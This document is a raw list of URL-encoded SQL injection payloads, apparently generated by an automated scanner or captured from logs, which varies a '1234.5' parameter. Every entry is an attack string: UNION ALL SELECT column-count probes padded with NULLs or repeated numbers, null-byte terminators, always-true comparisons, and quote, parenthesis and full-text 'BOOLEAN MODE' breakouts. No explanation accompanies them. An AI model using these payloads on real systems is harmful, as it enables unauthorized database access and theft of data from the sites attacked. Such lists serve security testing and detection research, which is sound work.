1234.5%27%20%2B%20%28SELECT%20%27DzIO%27%20FROM%20DUAL%20WHERE%205042%3D5042%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27rLjW%27%20WHERE%205121%3D5121%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27IFUJ%27%20WHERE%205169%3D5169%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Jkml%27%20WHERE%205729%3D5729%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BCcE%27%20WHERE%209710%3D9710%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27nXgO%27%20WHERE%206872%3D6872%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ENmg%27%20WHERE%202973%3D2973%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Bmhg%27%20WHERE%208737%3D8737%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27fwss%27%20WHERE%204818%3D4818%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27qCDW%27%20WHERE%209964%3D9964%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27FDPr%27%20WHERE%209661%3D9661%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -7803%29%20UNION%20ALL%20SELECT%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%00 -6011%29%20UNION%20ALL%20SELECT%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%2C%207461%00 -7032%29%20UNION%20ALL%20SELECT%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%2C%202802%00 -2421%29%20UNION%20ALL%20SELECT%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%00 -1130%29%20UNION%20ALL%20SELECT%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%2C%209289%00 -6804%29%20UNION%20ALL%20SELECT%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%2C%208210%00 -2878%29%20UNION%20ALL%20SELECT%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%2C%204810%00 -6137%29%20UNION%20ALL%20SELECT%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%2C%206351%00 -2031%29%20UNION%20ALL%20SELECT%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%2C%204434%00 -5588%29%20UNION%20ALL%20SELECT%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%2C%204065%00 -8988%27%29%20UNION%20ALL%20SELECT%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%00 -4898%27%29%20UNION%20ALL%20SELECT%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%2C%201685%00 -3637%27%29%20UNION%20ALL%20SELECT%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%2C%208809%00 -1471%27%29%20UNION%20ALL%20SELECT%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%2C%202189%00 -5409%27%29%20UNION%20ALL%20SELECT%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%2C%209507%00 -5331%27%29%20UNION%20ALL%20SELECT%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%2C%203888%00 -2379%27%29%20UNION%20ALL%20SELECT%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%2C%203480%00 -3594%27%29%20UNION%20ALL%20SELECT%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%2C%207411%00 -4630%27%29%20UNION%20ALL%20SELECT%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%2C%204338%00 -8533%27%29%20UNION%20ALL%20SELECT%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%2C%204975%00 -3609%27%20UNION%20ALL%20SELECT%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%2C%202298%00 -5750%27%20UNION%20ALL%20SELECT%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%2C%201907%00 -3294%27%20UNION%20ALL%20SELECT%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%2C%205478%00 -4243%27%20UNION%20ALL%20SELECT%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%2C%208924%00 -9884%27%20UNION%20ALL%20SELECT%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%00 -3354%27%20UNION%20ALL%20SELECT%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%2C%207331%00 -7391%27%20UNION%20ALL%20SELECT%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%2C%208732%00 -7298%27%20UNION%20ALL%20SELECT%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%2C%206131%00 -1471%27%20UNION%20ALL%20SELECT%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%2C%201498%00 -3930%27%20UNION%20ALL%20SELECT%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%2C%204806%00 -2693%22%20UNION%20ALL%20SELECT%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%2C%205473%00 -3271%22%20UNION%20ALL%20SELECT%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%2C%208169%00 -3846%22%20UNION%20ALL%20SELECT%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%2C%207011%00 -5629%22%20UNION%20ALL%20SELECT%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%2C%208103%00 -1180%22%20UNION%20ALL%20SELECT%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%2C%207888%00 -5700%22%20UNION%20ALL%20SELECT%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%2C%206058%00 -8177%22%20UNION%20ALL%20SELECT%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%2C%206621%00 -5198%22%20UNION%20ALL%20SELECT%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%00 -4854%22%20UNION%20ALL%20SELECT%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%00 -5584%22%20UNION%20ALL%20SELECT%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%00 -1919%29%20UNION%20ALL%20SELECT%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%00%20AND%20%285819%3D5819 -4244%29%20UNION%20ALL%20SELECT%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%2C%207286%00%20AND%20%281280%3D1280 -7926%29%20UNION%20ALL%20SELECT%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%00%20AND%20%285252%3D5252 -3289%29%20UNION%20ALL%20SELECT%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%2C%206419%00%20AND%20%285251%3D5251 -6806%29%20UNION%20ALL%20SELECT%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%00%20AND%20%281887%3D1887 -8450%29%20UNION%20ALL%20SELECT%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%2C%201920%00%20AND%20%288022%3D8022 -6454%29%20UNION%20ALL%20SELECT%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%2C%209963%00%20AND%20%285404%3D5404 -7942%29%20UNION%20ALL%20SELECT%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%2C%204253%00%20AND%20%283349%3D3349 -7682%29%20UNION%20ALL%20SELECT%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%2C%206870%00%20AND%20%289388%3D9388 -3188%29%20UNION%20ALL%20SELECT%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%2C%204654%00%20AND%20%287257%3D7257 -5753%29%29%20UNION%20ALL%20SELECT%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%2C%203543%00%20AND%20%28%288510%3D8510 -3604%29%29%20UNION%20ALL%20SELECT%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%2C%206956%00%20AND%20%28%283487%3D3487 -8115%29%29%20UNION%20ALL%20SELECT%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%2C%205438%00%20AND%20%28%284366%3D4366 